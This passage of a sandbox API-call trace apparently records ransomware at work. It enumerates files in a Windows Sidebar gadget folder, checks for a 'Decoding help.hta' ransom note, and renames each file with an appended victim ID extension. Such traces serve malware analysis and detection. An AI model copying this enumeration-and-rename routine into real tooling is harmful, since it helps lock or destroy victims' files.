(x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.047] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadc0a0d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbadc0a0d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb1721fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="next_rest.png", cAlternateFileName="")) returned 1 [0059.047] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.047] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.047] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.047] lstrcmpiW (lpString1="Decoding help.hta", lpString2="next_rest.png") returned -1 [0059.047] lstrlenW (lpString="next_rest.png") returned 13 [0059.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.047] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.047] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="next_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" [0059.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" [0059.047] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.048] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="on_desktop", cAlternateFileName="ON_DES~1")) returned 1 [0059.048] lstrcmpW (lpString1=".", lpString2="on_desktop") returned -1 [0059.048] lstrcmpW (lpString1="..", lpString2="on_desktop") returned -1 [0059.048] lstrcmpiW (lpString1="windows", lpString2="on_desktop") returned 1 [0059.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.048] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="on_desktop" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop" [0059.049] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*" [0059.049] GlobalMemoryStatus (in: lpBuffer=0x2bdefd10 | out: lpBuffer=0x2bdefd10) [0059.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24655338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd6c [0059.049] CloseHandle (hObject=0xd6c) returned 1 [0059.049] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae7f0e8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbae7f0e8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb19835c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbca, dwReserved0=0x0, dwReserved1=0x0, cFileName="pause_down.png", cAlternateFileName="")) returned 1 [0059.049] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.049] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.049] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.050] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pause_down.png") returned -1 [0059.050] lstrlenW (lpString="pause_down.png") returned 14 [0059.050] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.050] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.050] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="pause_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" [0059.050] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" [0059.050] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.050] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaea5247, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaea5247, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb1be4bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="pause_hov.png", cAlternateFileName="")) returned 1 [0059.050] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.050] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.050] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.050] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pause_hov.png") returned -1 [0059.050] lstrlenW (lpString="pause_hov.png") returned 13 [0059.050] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.050] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.050] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="pause_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" [0059.051] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" [0059.051] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.052] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaecb3a6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaecb3a6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb1e461c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb11, dwReserved0=0x0, dwReserved1=0x0, cFileName="pause_rest.png", cAlternateFileName="")) returned 1 [0059.053] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.053] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.053] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.053] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pause_rest.png") returned -1 [0059.053] lstrlenW (lpString="pause_rest.png") returned 14 [0059.053] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.053] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.053] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="pause_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" [0059.053] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" [0059.053] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.053] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.053] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaef1505, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaef1505, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb1e461c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="play_down.png", cAlternateFileName="")) returned 1 [0059.053] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.053] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.053] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.053] lstrcmpiW (lpString1="Decoding help.hta", lpString2="play_down.png") returned -1 [0059.053] lstrlenW (lpString="play_down.png") returned 13 [0059.053] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.054] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="play_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" [0059.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" [0059.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.054] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf17664, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbaf17664, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb20a77c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="play_hov.png", cAlternateFileName="")) returned 1 [0059.054] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.054] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.055] lstrcmpiW (lpString1="Decoding help.hta", lpString2="play_hov.png") returned -1 [0059.055] lstrlenW (lpString="play_hov.png") returned 12 [0059.055] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.055] lstrlenW 